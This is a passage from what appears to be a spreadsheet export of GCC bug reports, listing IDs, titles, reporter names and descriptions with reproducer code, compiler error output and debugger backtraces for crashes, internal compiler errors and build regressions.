/Users/regress/tbox/native/build/./gcc/xgcc -B/Users/regress/tbox/native/build/./gcc/ -B/Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/bin/ -B/Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/lib/ -isystem /Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/include -isystem /Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/sys-include    -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -Wa-force_cpusubtype_ALL -pipe -mmacosx-version-min=10.4 -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -fno-stack-protector  -dynamiclib -nodefaultlibs -install_name /Users/regress/tbox/objs/lib/libgcc_s.1.dylib -single_module -o ppc64/libgcc_s.dylib -Wl-exported_symbols_listlibgcc.map -compatibility_version 1 -current_version 1.0 -g -O2 -m64 -B./ _muldi3_s.o _negdi2_s.o _lshrdi3_s.o _ashldi3_s.o _ashrdi3_s.o _cmpdi2_s.o _ucmpdi2_s.o _clear_cache_s.o _enable_execute_stack_s.o _
 trampoline_s.o __main_s.o _absvsi2_s.o _absvdi2_s.o _addvsi3_s.o _addvdi3_s.o _subvsi3_s.o _subvdi3_s.o _mulvsi3_s.o _mulvdi3_s.o _negvsi2_s.o _negvdi2_s.o _ctors_s.o _ffssi2_s.o _ffsdi2_s.o _clz_s.o _clzsi2_s.o _clzdi2_s.o _ctzsi2_s.o _ctzdi2_s.o _popcount_tab_s.o _popcountsi2_s.o _popcountdi2_s.o _paritysi2_s.o _paritydi2_s.o _powisf2_s.o _powidf2_s.o _powixf2_s.o _powitf2_s.o _mulsc3_s.o _muldc3_s.o _mulxc3_s.o _multc3_s.o _divsc3_s.o _divdc3_s.o _divxc3_s.o _divtc3_s.o _bswapsi2_s.o _bswapdi2_s.o _fixunssfsi_s.o _fixunsdfsi_s.o _fixunsxfsi_s.o _fixsfdi_s.o _fixdfdi_s.o _fixxfdi_s.o _fixtfdi_s.o _fixunssfdi_s.o _fixunsdfdi_s.o _fixunsxfdi_s.o _fixunstfdi_s.o _floatdisf_s.o _floatdidf_s.o _floatdixf_s.o _floatditf_s.o _floatundisf_s.o _floatundidf_s.o _floatundixf_s.o _floatunditf_s.o _divdi3_s.o _moddi3_s.o _udivdi3_s.o _umoddi3_s.o _udiv_w_sdiv_s.o _udivmoddi4_s.o darwin-tramp_s.o ppc64-fp_s.o darwin-64_s.o darwin-ldouble_s.o darwin-world_s.o unwind-dw2_s.o unwind-dw2-fd
 e-darwin_s.o unwind-sjlj_s.o unwind-c_s.o darwin-fallback_s.o emutls_s.o -lc
collect2: ld terminated with signal 10 [Bus error]</t>
  </si>
  <si>
    <t>GCC-27720</t>
  </si>
  <si>
    <t>ICE with initialization of invalid variable</t>
  </si>
  <si>
    <t>The following invalid testacse triggers an ICE since at least GCC 2.95.3:
================================
struct A
template struct A {}
A a(0)
================================
bug.cc:2: error: 'A' is not a template type
bug.cc:4: internal compiler error: in store_init_value at cp/typeck2.c:593
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-12206</t>
  </si>
  <si>
    <t>Segmentation fault in basic_filebuf::seekoff</t>
  </si>
  <si>
    <t>basic_filebuf::imbue(loc) only modifies _M_codecvt if the correct codecvt
facet is found in loc otherwise _M_codecvt is left pointing at the
codecvt facet from the previous locale which may no longer be valid.
If basic_filebuf::seekoff is called when _M_codecvt has become invalid
the program segfaults.</t>
  </si>
  <si>
    <t>GCC-68416</t>
  </si>
  <si>
    <t>[MPX] GCC emits a lot of redundant bndmov instructions</t>
  </si>
  <si>
    <t>Many tests show we have lots of redundant bndmov instructions. E.g.:
&gt;cat test.c
int
foo(int **arr int i)
{
  return (*arr)[i]
}
&gt;gcc -O2 -mmpx -fcheck-pointer-bounds test.c -S
&gt;cat test.s
        .file   test.c
        .text
        .p2align 415
        .globl  foo
        .type   foo @function
foo:
.LFB1:
        .cfi_startproc
        bndcl   (%rdi) %bnd0
        bndmov  %bnd0 -24(%rsp)
        movslq  %esi %rsi
        bndcu   7(%rdi) %bnd0
        movq    (%rdi) %rax
        bndldx  (%rdi%rax) %bnd3
        leaq    (%rax%rsi4) %rax
        bndmov  %bnd3 -24(%rsp)
        bndcl   (%rax) %bnd3
        bndmov  -24(%rsp) %bnd1
        bndcu   3(%rax) %bnd1
        movl    (%rax) %eax
        bnd ret
Here we have 3 bndmov instructions we don't need.</t>
  </si>
  <si>
    <t>GCC-1873</t>
  </si>
  <si>
    <t>Can't see nested type declared in superclass of enclosing context</t>
  </si>
  <si>
    <t>Compiling the code below produces the following error:
Super.java:11: Superclass `InsideCl' of class `Sub$sc$a' not found.
       class a extends InsideCl implements Inside {}
                       ^
Super.java:11: Superinterface `Inside' of class `Sub$sc$a' not found.
       class a extends InsideCl implements Inside {}
                                           ^
2 errors
Release:
unknown
Environment:
gcc version 2.97 20010204 (experimental)
How-To-Repeat:
public class Super
{
  interface Inside {}
  class InsideCl {}
}
class Sub extends Super
{
  class sc
  {
    class a extends InsideCl implements Inside {}
  }
}</t>
  </si>
  <si>
    <t>GCC-7829</t>
  </si>
  <si>
    <t>-march=athlon causes GCC3 to fail with ICE</t>
  </si>
  <si>
    <t xml:space="preserve">	The sample code below causes GCC versions 3.1.1 3.2 and the one built
        from the top of gcc-3_2-branch to die with message:
$ gcc32 -O -march=athlon -c bad.c
bad.c: In function `gbkext1_mbtowc':
bad.c:5: unrecognizable insn:
(insn 55 53 57 (set (reg:QI 68)
        (const_int 128 [0x80])) -1 (nil)
    (nil))
bad.c:5: Internal compiler error in extract_insn at recog.c:2148
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
0x80 is not a valid representation for 128 in QImode. It should
be 0xffffff80 (i.e. sign extended) for insn to be recognized.
The proposed one-line patch seems to fix the problem.
Release:
3.2 [FreeBSD]
Environment:
System: FreeBSD ork.gte.com 4.6-STABLE FreeBSD 4.6-STABLE #1: Mon Aug 12 12:13:55 EDT 2002 root@ork.gte.com:/usr/src/sys/compile/KAN i386
host: i386-portbld-freebsd4.6
build: i386-portbld-freebsd4.6
target: i386-portbld-freebsd4.6
configured with: ./..//gcc-3.2/configure --disable-nls --with-gnu-as --with-gnu-ld --with-gxx-include-dir=/usr/local/lib/gcc-lib/i386-portbld-freebsd4.6/3.2/include/g++ --disable-shared --prefix=/usr/local i386-portbld-freebsd4.6
How-To-Repeat:
static unsigned int
gbkext1_mbtowc (unsigned char c1 unsigned char c2)
{
  return  c1 + (c2 - (c2 &gt;= 0x80 ? 0x41 : 0x40))
}</t>
  </si>
  <si>
    <t>ak03</t>
  </si>
  <si>
    <t>GCC-20385</t>
  </si>
  <si>
    <t>Lame parse error message for undefined type</t>
  </si>
  <si>
    <t>% cat test.c
unknowntype f() { return 0 }
% gcc -c test.c
test.c:1: error: expected '=' '' '' 'asm' or '__attribute__' before 'f'
Firstly since this is a frequent mistake we should really be able to produce
unknowntype used like a type as other compilers do.
Secondly IMHO this kind of expected ... error message is *never* a good
idea. I cannot recall a single instance where it was actually helpful to me
and very often as in this case it is extremely confusing and I would be 
better off with plain syntax error before f as it used to be in the old
parser. Even though my knowledge of C parsing is probably slightly above 
average I have not the slightest idea why the parser expects '=' '' ''
'asm' or '__attribute__' here and what I can derive from that about the
mistake I made. But maybe that's just me.</t>
  </si>
  <si>
    <t>GCC-39580</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 145204 caused libgomp.c++/collapse-2.C</t>
  </si>
  <si>
    <t>Revision 145204:
http://gcc.gnu.org/ml/gcc-cvs/2009-03/msg00711.html
caused:
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-all-loops
-finline-functions  (internal compiler error)
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-all-loops
-finline-functions  (test for excess errors)
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-loops 
(internal compiler error)
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-loops  (test
for excess errors)
on Linux/ia64.</t>
  </si>
  <si>
    <t>GCC-55445</t>
  </si>
  <si>
    <t>Always defined __SEH__ when build from trunk</t>
  </si>
  <si>
    <t>When I try to build gcc from trunk with mingw-w64 I successfully build
only 64bit with seh exceptions. Other builds stop on error:
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c:238:1:
warning: no previous prototype for '__gcc_personality_seh0'
[-Wmissing-prototypes]
 __gcc_personality_seh0 (PEXCEPTION_RECORD ms_exc void *this_frame
 ^
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c: In
function '__gcc_personality_seh0':
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c:242:14:
error: '__gcc_personality_imp' undeclared (first use in this function)
     ms_disp __gcc_personality_imp)
              ^
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c:242:14:
note: each undeclared identifier is reported only once for each
function it appears in
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c: At top level:
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c:94:33:
warning: '__gcc_personality_sj0' defined but not used
[-Wunused-function]
 #define PERSONALITY_FUNCTION    __gcc_personality_sj0
                                 ^
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c:120:1:
note: in expansion of macro 'PERSONALITY_FUNCTION'
 PERSONALITY_FUNCTION (int version
 ^
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c: In
function '__gcc_personality_seh0':
../../../../../../mingw-sources/gcc-trunk/libgcc/unwind-c.c:243:1:
warning: control reaches end of non-void function [-Wreturn-type]
 }
 ^
make[4]: *** [unwind-c.o] Error 1
make[4]: *** Waiting for unfinished jobs....
I  find that __SEH__ defined in gcc/config/i386/cygming.h as
.....
#undef TARGET_SEH
#define TARGET_SEH  (TARGET_64BIT_MS_ABI &amp;&amp; flag_unwind_tables)
....
#define TARGET_OS_CPP_BUILTINS() \
  do \
    { \
if (!TARGET_64BIT) \
  builtin_define (_X86_=1) \
if (TARGET_SEH) \
  builtin_define (__SEH__)
.....
As I think __SEH__ is always defined that leads to error.</t>
  </si>
  <si>
    <t>GCC-3111</t>
  </si>
  <si>
    <t>Demangler in libiberty.a is broken</t>
  </si>
  <si>
    <t>A qualifier 'K' results rather stupidly in a 'const'
being appended to whatever the following type.  The
demangler doesn't take into account that types exist
of a 'prefix' and a 'postfix' part where the 'const'
needs to be added in between.
Example:
/usr/src/gcc/gcc-cvs-3.0/libiberty&gt;gcc-3.0 -DSTANDALONE_DEMANGLER -I../include cp-demangle.c dyn-string.c xmalloc.c xexit.c -o c++filt
cp-demangle.c: In function `demangle_char':
cp-demangle.c:968: warning: assignment makes pointer from integer without a cast
/usr/src/gcc/gcc-cvs-3.0/libiberty&gt;./c++filt _Z1fKPFiiE
f(int (*)(int) const)
Which should have been
f(int (* const)(int))
This could be considered as a regression from 2.95.3
as this does handle the 'C' qualifier correctly.
For example:
/usr/src/gcc/gcc-2.95.3/libiberty&gt;../../gcc-2.95.3-objdir/gcc/c++filt __1ACPFi_i
A::A(int (*const)(int))
Release:
3.0</t>
  </si>
  <si>
    <t>GCC-1777</t>
  </si>
  <si>
    <t>-mmx and -msse are broken</t>
  </si>
  <si>
    <t xml:space="preserve">	Invoking GCC on i686 with -msse or -mmmx gives an internal error
Release:
2.97 20010126 (experimental)
Environment:
System: Linux gromit 2.4.0 #58 Fri Jan 5 18:22:21 CET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /cvs/gcc/configure --prefix=/opt/gcc-2.97.test --enable-shared --enable-threads=posix --with-gnu-as --with-gnu-ld --disable-nls --with-system-zlib --enable-languages=cobjcc++f77
How-To-Repeat:
	Just use -mmmx on any program and you get:
/opt/gcc-2.97.test/bin/gcc -msse /tmp/t.c
cc1: Internal error: Segmentation fault.
Please submit a full bug report with preprocessed source
if appropriate.  See  for instructions.
Here's a backtrace:
GNU C version 2.97 20010126 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 2.97 20010126 (experimental).
Program received signal SIGSEGV Segmentation fault.
build_function_type (value_type=0x0 arg_types=0x4001e44c)
    at /cvs/gcc/gcc/tree.c:3873
3873      if (TREE_CODE (value_type) == FUNCTION_TYPE)
(gdb) bt
#0  build_function_type (value_type=0x0 arg_types=0x4001e44c)
    at /cvs/gcc/gcc/tree.c:3873
#1  0x8264fd9 in ix86_init_builtins () at /cvs/gcc/gcc/config/i386/i386.c:7731
#2  0x807c18c in c_common_nodes_and_builtins () at /cvs/gcc/gcc/c-common.c:2838
#3  0x8058c5b in init_decl_processing () at /cvs/gcc/gcc/c-decl.c:2961
#4  0x8096c18 in compile_file (name=0xbffff860 t.c)
    at /cvs/gcc/gcc/toplev.c:2187
#5  0x809aa7c in main (argc=25 argv=0xbffff59c) at /cvs/gcc/gcc/toplev.c:4879
#6  0x40045baf in __libc_start_main () from /lib/libc.so.6
(gdb) p intTI_type_node
No symbol intTI_type_node in current context.
(gdb) up
#1  0x8264fd9 in ix86_init_builtins () at /cvs/gcc/gcc/config/i386/i386.c:7731
7731        = build_function_type (intTI_type_node endlink)
(gdb) p intTI_type_node
No symbol intTI_type_node in current context.
(gdb) p intTI_type_node
No symbol intTI_type_node in current context.
(gdb) p global_trees
$1 = {0x4001a450 0x4001d548 0x4001d5b0 0x4001d618 0x4001d680 0x0 
  0x4001d6e8 0x4001d750 0x4001d7b8 0x4001d820 0x0 0x4001cb00 0x4001cb20 
  0x4001cb80 0x4001cb40 0x4001ca20 0x4001cb60 0x4001ca00 0x4001c360 
  0x4001f750 0x4001f7b8 0x4001f820 0x4001f888 0x4001f618 0x4001f680 
  0x4001f6e8 0x4001f478 0x4001f4e0 0x4001f5b0 0x0 0x4001f8f0 0x4001e44c 
  0x4001f958 0x4001fbc8 0x400202d8 0x40020068 0x4001fe38 0x0}
(gdb) p global_trees[5]
$2 = 0x0
The problem is that global_trees[TI_INTTI_TYPE] is not initialized.</t>
  </si>
  <si>
    <t>GCC-54620</t>
  </si>
  <si>
    <t>sha1.c has incorrect math if sizeof(size_t) is 8</t>
  </si>
  <si>
    <t>In libiberty/sha1.* I don't see anything saying that sha1_process_block() has a size limit on its input buffer and if the length of the buffer is big (e.g. 2^32 on a 64-bit machine) then this code won't correctly add a 64-bit number to 64-bit number:
  /* First increment the byte count.  RFC 1321 specifies the possible
     length of the file up to 2^64 bits.  Here we only compute the
     number of bytes.  Do a double word increment.  */
  ctx-&gt;total[0] += len
  if (ctx-&gt;total[0] &lt; len)
    ++ctx-&gt;total[1]
The above is at sha1.c around line 302.
Also Florian Weimer pointed out that code nearby uses len &amp; ~63 when it perhaps should use something like len &amp; (~(size_t)63).
Similar bug(s) are in md5.*. See bug 39064 for details.</t>
  </si>
  <si>
    <t>pikegadgets+gcc</t>
  </si>
  <si>
    <t>GCC-26586</t>
  </si>
  <si>
    <t>g77 -pedantic wrongly rejecting statement function</t>
  </si>
  <si>
    <t>The following Fortran 77 program declares and uses a statement function 
I2C(M). When compiled with these options:
  g77 -pedantic -v -save-temps 
it is misread as a character substring with its : missing but IMHO
this statement function is valid in Fortran 77. The program compiles 
and runs OK if the -pedantic is removed. Below are the program listing 
the compiler output and the .s file generated by the compiler. 
There was no .i* file.
          tahi[~/Jfh] % cat testsf.f
      PROGRAM TESTSF
      CHARACTER I2C*2 CDIGIT(0:9)*1
      DATA CDIGIT/'0''1''2''3''4''5''6''7''8''9'/
* Statement function I2C to convert integer 0 to 99 to character*2
      I2C(M)   = CDIGIT(M/10) // CDIGIT(MOD(M10))
* End of statement functions start of executables
      PRINT '(10A3)' (I2C(M)M=099)
      END
tahi[~/Jfh]
tahi[~/Jfh] % g77 -pedantic -v -save-temps testsf.f
Driving: g77 -pedantic -v -save-temps testsf.f -lfrtbegin -lg2c -lm -shared-libgcc
Reading specs from /usr/pkg/gcc3/lib/gcc-lib/sparc-sun-solaris2/3.3.4/specs
Configured with: ./configure --prefix=/usr/pkg/gcc3 --host=sparc-sun-solaris2 --enable-shared --enable-languages=f77
Thread model: posix
gcc version 3.3.4
 /usr/pkg/gcc3/lib/gcc-lib/sparc-sun-solaris2/3.3.4/f771 testsf.f -quiet -dumpbase testsf.f -auxbase testsf -pedantic -version -o testsf.s
GNU F77 version 3.3.4 (sparc-sun-solaris2)
        compiled by GNU C version 3.3.4.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
testsf.f: In program `testsf':
testsf.f:5:
         I2C(M)   = CDIGIT(M/10) // CDIGIT(MOD(M10))
         1    2
Missing colon as of (2) in substring reference for (1)
testsf.f:7:
         PRINT '(10A3)' (I2C(M)M=099)
                          1    2
Missing colon as of (2) in substring reference for (1)
tahi[~/Jfh] %          
tahi[~/Jfh] % cat testsf.s
        .file   testsf.f
        .section        .data
        .align 8
        .type   cdigit.0 #object
        .size   cdigit.0 10
cdigit.0:
        .ascii  0
        .ascii  1
        .ascii  2
        .ascii  3
        .ascii  4
        .ascii  5
        .ascii  6
        .ascii  7
        .ascii  8
        .ascii  9
        .global .rem
        .global .div
        .section        .rodata
        .align 8
.LLC1:
        .asciz  (10A3)
        .section        .data
        .align 4
        .type   __g77_cilist_0.1 #object
        .size   __g77_cilist_0.1 20
__g77_cilist_0.1:
        .long   0
        .long   6
        .long   0
        .long   .LLC1
        .long   0
        .ident  GCC: (GNU) 3.3.4
tahi[~/Jfh] %</t>
  </si>
  <si>
    <t>GCC-46692</t>
  </si>
  <si>
    <t>Missing LM32 multilibs for divider and sign extender</t>
  </si>
  <si>
    <t>Created attachment 22553
Fixes the problem
Multilibs with the optional divider and the sign extender are missing for the LM32 target. Patch attached.</t>
  </si>
  <si>
    <t>sebastien.bourdeauducq</t>
  </si>
  <si>
    <t>GCC-61877</t>
  </si>
  <si>
    <t>[5 Regression]: reflect: cannot use []string as type string in Call</t>
  </si>
  <si>
    <t>Created attachment 33171
test case that can be executed with go test -compiler gccgo -test.v  reflect_test
There is a regression in the runtime behavior of the reflection module.
Attached is a very simple ( &lt; 30 lines) test case (that can be execured via go test command). I hope this can be included in the normal test suite
Expected behavior:
     go run -compiler gccgo src/ref_main.go go test -compiler gccgo -test.v  reflect_test
should result in:
     === RUN TestFindingVarargMethod
     --- PASS: TestFindingVarargMethod (0.00 seconds)
     PASS
     ok
Actual behavior:
     === RUN TestFindingVarargMethod
     --- FAIL: TestFindingVarargMethod (0.00 seconds)
     panic: reflect: cannot use []string as type string in Call [recovered]
	     panic: reflect: cannot use []string as type string in Call
     goroutine 20 [running]:
     testing.$nested5
	     ../.././libgo/go/testing/testing.go:406
     reflect.call.N13_reflect.Value
	     ../.././libgo/go/reflect/value.go:494
     reflect.Call.N13_reflect.Value
	     ../.././libgo/go/reflect/value.go:412
     reflect.call.pN20_reflect.makeFuncImpl
	     ../.././libgo/go/reflect/makefunc.go:198
     reflect.MakeFuncStubGo
	     ../.././libgo/go/reflect/makefuncgo_amd64.go:322
     reflect_test_test.TestFindingVarargMethod
	     /home/ashopov/WORK/GO/src/reflect_test/finder_test.go:19
     testing.tRunner
	     ../.././libgo/go/testing/testing.go:422
     created by testing.RunTests
	     ../.././libgo/go/testing/testing.go:504
     goroutine 16 [chan receive]:
     testing.RunTests
     	../.././libgo/go/testing/testing.go:505
     testing.Main
     	../.././libgo/go/testing/testing.go:435
     main.main
     	/tmp/go-build886615920/reflect_test/_test/_testmain.go:47
     created by main
     	../.././libgo/runtime/go-main.c:42
     goroutine 18 [finalizer wait]:
     created by runtime_createfing
     	../.././libgo/runtime/mgc0.c:2596
     exit status 2
     FAIL	reflect_test	0.058s
This test case is WORKING fine with:
1. golang-pkg-bin-linux-amd64-1.2.2-7 distributed with Fedora 20
which corresponds to 
2. gcc 4.9:
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ashopov/WORK/GCC/libexec/gcc/x86_64-linux-gnu/4.9.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../configure --prefix=/home/ashopov/WORK/GCC --build=x86_64-linux-gnu --disable-browser-plugin --disable-libgcj --disable-libmudflap --disable-vtable-verify --disable-libunwind-exceptions --enable-checking=release --disable-bootstrap --enable-__cxa_atexit --enable-gnu-unique-object --enable-languages=cc++golto --enable-linker-build-id --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-linker-hash-style=gnu --with-system-zlib --with-tune=generic --enable-multiarch
Thread model: posix
gcc version 4.9.1 20140709 (prerelease) (GCC) 
This test case is FAILING with:
1. gcc 4.10
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ashopov/WORK/GCC-TRUNK/libexec/gcc/x86_64-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ./configure --prefix=/home/ashopov/WORK/GCC-TRUNK --build=x86_64-linux-gnu --disable-browser-plugin --disable-libgcj --disable-libmudflap --disable-vtable-verify --disable-libunwind-exceptions --enable-checking=release --disable-bootstrap --enable-__cxa_atexit --enable-gnu-unique-object --enable-languages=cc++golto --enable-linker-build-id --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-linker-hash-style=gnu --with-system-zlib --with-tune=generic --enable-multiarch
Thread model: posix
gcc version 4.10.0 20140721 (experimental) (GCC) 
Machine used for tests:
uname -a
Linux ashopov-dev 3.15.6-200.fc20.x86_64 #1 SMP Fri Jul 18 02:36:27 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>GCC-60999</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ICE when static_cast from constexpr in specialization of template-class</t>
  </si>
  <si>
    <t>Created attachment 32705
source which can reproduce the ICE
The following code produces an internal compiler error (ICE) in GCC 4.9 but did compile fine in GCC 4.8:
  // general template
  template 
  struct foo
  {
  }
  // template specialization
  template
  struct foo
  {
      static constexpr int code = 42
      unsigned int bar = static_cast(code)
      // ICE at static_cast during instantiation. --^
  }
  // instantiation
  foo a
Compiling with the following line (using GCC 4.9) reproduced the ICE:
  g++ -Wall -Wextra -std=c++11 -c ICE.cpp
The output of 'g++ -v -save-temps -Wall -Wextra -std=c++11 -c ICE.cpp' yields the following information:
Using built-in specs.
COLLECT_GCC=g++
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.9-20140406-1ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.0 20140405 (experimental) [trunk revision 209157] (Ubuntu 4.9-20140406-1ubuntu1) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=c++11' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.9/cc1plus -E -quiet -v -imultiarch x86_64-linux-gnu -D_GNU_SOURCE ICE.cpp -mtune=generic -march=x86-64 -std=c++11 -Wall -Wextra -fpch-preprocess -fstack-protector -Wformat -Wformat-security -o ICE.ii
ignoring duplicate directory /usr/include/x86_64-linux-gnu/c++/4.9
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.9/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.9
 /usr/include/x86_64-linux-gnu/c++/4.9
 /usr/include/c++/4.9/backward
 /usr/lib/gcc/x86_64-linux-gnu/4.9/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.9/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-Wextra' '-std=c++11' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.9/cc1plus -fpreprocessed ICE.ii -quiet -dumpbase ICE.cpp -mtune=generic -march=x86-64 -auxbase ICE -Wall -Wextra -std=c++11 -version -fstack-protector -Wformat -Wformat-security -o ICE.s
GNU C++ (Ubuntu 4.9-20140406-1ubuntu1) version 4.9.0 20140405 (experimental) [trunk revision 209157] (x86_64-linux-gnu)
	compiled by GNU C version 4.9.0 20140405 (experimental) [trunk revision 209157] GMP version 5.1.3 MPFR version 3.1.2-p3 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (Ubuntu 4.9-20140406-1ubuntu1) version 4.9.0 20140405 (experimental) [trunk revision 209157] (x86_64-linux-gnu)
	compiled by GNU C version 4.9.0 20140405 (experimental) [trunk revision 209157] GMP version 5.1.3 MPFR version 3.1.2-p3 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 6752b609dd6385b31002233d89fe2356
ICE.cpp:17:10:   in constexpr expansion of â€˜a.foo::foo()â€™
ICE.cpp:17:10: internal compiler error: unexpected expression â€˜static_cast(foo::code)â€™ of kind static_cast_expr
 foo a
          ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc5DJH1d.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>D.Bahadir</t>
  </si>
  <si>
    <t>GCC-1818</t>
  </si>
  <si>
    <t>problems with cout.width segmentation fault</t>
  </si>
  <si>
    <t xml:space="preserve">Running the following program tp generates a segmentation
fault. Something is wrong with the cout.width function.
Release:
2.97 20010129 (experimental)
Environment:
System: Linux kiste 2.4.0 #25 Tue Jan 16 01:22:25 CET 2001 i686 unknown
Architecture: i686
glibc 2.1.3
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-nls --enable-shared
How-To-Repeat:
source code tp.C
#include
int main()
{
    std::cout.width(28)
    std::cout &lt;&lt;  
}
Running the program tp
peter@kiste:~ &gt; ./tp
Segmentation fault (core dumped)
backtrace of tp
GNU gdb 20010114
Copyright 2000 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i686-pc-linux-gnu...
(gdb) set demangle gnu-v3
(gdb) r
Starting program: /home/peter/trans/c++/breymann/examples/k8/tp 
Program received signal SIGSEGV Segmentation fault.
0x40109557 in memcpy (dstpp=0x8049e48 srcpp=0x80498 len=28)
    at ../sysdeps/generic/memcpy.c:55
55	../sysdeps/generic/memcpy.c: No such file or directory.
	in ../sysdeps/generic/memcpy.c
(gdb) bt
#0  0x40109557 in memcpy (dstpp=0x8049e48 srcpp=0x80498 len=28)
    at ../sysdeps/generic/memcpy.c:55
#1  0x4006474b in std::basic_streambuf &gt;::xsputn(char const* int) (this=0x8049a78 __s=0x80498  
    __n=28) at ../../../../gcc/libstdc++-v3/include/bits/char_traits.h:188
#2  0x40078b18 in std::basic_filebuf &gt;::xsputn(char const* int) (this=0x8049a78 __s=0x80498  
    __n=28) at ../../../../gcc/libstdc++-v3/include/bits/std_fstream.h:224
#3  0x40074084 in std::ostream::write(char const* int) (this=0x80499c0 
    __s=0x80498  __n=28)
    at ../../../../gcc/libstdc++-v3/include/bits/std_streambuf.h:378
#4  0x40075495 in std::basic_ostream &gt;&amp; std::operator &gt;(std::basic_ostream &gt;&amp; char const*) (__out= 
    __s=0x80498 )
    at ../../../../gcc/libstdc++-v3/include/bits/std_ostream.h:648
#5  0x080486ba in main () at tp.C:6
#6  0x400caa4e in __libc_start_main (main=0x8048690  argc=1 
    argv=0xbffff88c init=0x80484dc  fini=0x80487dc  
    rtld_fini=0x4000aa20  stack_end=0xbffff884)
    at ../sysdeps/generic/libc-start.c:92
(gdb) 
Compiling the program tp
g++ -v -o tp tp.C -W -Wall -g -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --disable-nls --enable-shared --enable-threads=posix
gcc version 2.97 20010129 (experimental)
